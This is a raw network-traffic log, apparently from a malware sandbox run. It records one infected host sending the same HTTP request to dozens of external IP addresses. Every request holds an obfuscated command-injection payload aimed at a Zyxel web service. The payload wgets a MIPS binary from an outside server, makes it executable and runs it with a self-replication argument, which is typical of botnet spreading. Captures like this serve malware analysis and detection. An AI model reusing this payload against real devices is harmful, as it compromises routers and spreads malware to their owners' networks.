                                                Jan 12, 2024 18:24:35.832953930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4411192.168.2.1347480142.157.33.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833000898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4412192.168.2.1354242125.34.29.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833064079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4413192.168.2.1336434181.244.37.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833108902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4414192.168.2.135535225.1.242.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833173990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4415192.168.2.1347458107.10.227.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833239079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4416192.168.2.134635827.186.126.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833275080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4417192.168.2.1340148187.176.239.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833317995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4418192.168.2.1348412213.219.229.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833379984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4419192.168.2.1340670198.20.236.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833419085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4420192.168.2.1359266125.72.26.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833463907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4421192.168.2.136020824.196.160.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833534002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4422192.168.2.1352694158.110.190.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833584070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4423192.168.2.134618265.101.218.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833643913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4424192.168.2.1351800152.183.116.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833688021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4425192.168.2.133748439.209.129.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833739996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4426192.168.2.134219645.195.149.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833789110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4427192.168.2.133883663.133.218.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833826065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4428192.168.2.133393096.18.153.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833854914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4429192.168.2.1350910182.140.84.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833899021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4430192.168.2.1340182165.183.9.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833930016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4431192.168.2.1358704135.63.115.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.833983898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4432192.168.2.1337412113.189.194.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834050894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4433192.168.2.1340876136.136.27.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834089994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4434192.168.2.136041823.40.223.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834129095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4435192.168.2.1346064110.5.116.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834183931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4436192.168.2.13546284.43.37.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834238052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4437192.168.2.1350396222.70.234.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834307909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4438192.168.2.1357198209.174.34.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834362984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4439192.168.2.135359025.194.82.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834423065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4440192.168.2.1349600193.67.222.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834470034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4441192.168.2.1355132204.157.187.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834537983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4442192.168.2.134245432.119.217.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834589005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4443192.168.2.1332938114.140.155.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834645033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4444192.168.2.1347784134.255.197.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834686995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4445192.168.2.134314877.163.205.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834764957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4446192.168.2.133720887.226.90.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834822893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4447192.168.2.13554282.10.140.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834856033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4448192.168.2.133550085.186.53.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834903955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4449192.168.2.1357786207.169.146.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.834959030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4450192.168.2.134552412.141.1.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835004091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4451192.168.2.135421493.226.141.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835067034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4452192.168.2.1348052173.195.93.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835100889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4453192.168.2.13468408.35.21.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835151911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4454192.168.2.1346994112.18.204.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835208893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4455192.168.2.1348606191.228.9.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835267067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4456192.168.2.134934261.196.51.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835299969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4457192.168.2.1360536124.106.180.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835354090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4458192.168.2.1350458120.155.4.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835407019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4459192.168.2.1338480168.250.139.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835438013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4460192.168.2.136024848.57.55.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835474014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4461192.168.2.1349310136.132.78.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835520983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4462192.168.2.1333252139.151.185.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835573912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4463192.168.2.1360090112.78.211.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835628986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4464192.168.2.1353300140.26.3.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835669041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4465192.168.2.135191817.141.200.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835730076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4466192.168.2.133475231.245.85.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835797071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4467192.168.2.1338642207.134.47.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835822105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4468192.168.2.1358000125.158.118.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835882902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4469192.168.2.1342710222.238.121.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835910082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4470192.168.2.1345718221.32.228.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835938931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4471192.168.2.133587674.114.198.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.835978031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4472192.168.2.134416495.120.243.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836028099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4473192.168.2.1342518193.199.225.155443
                                                TimestampBytes transferredDirectionData
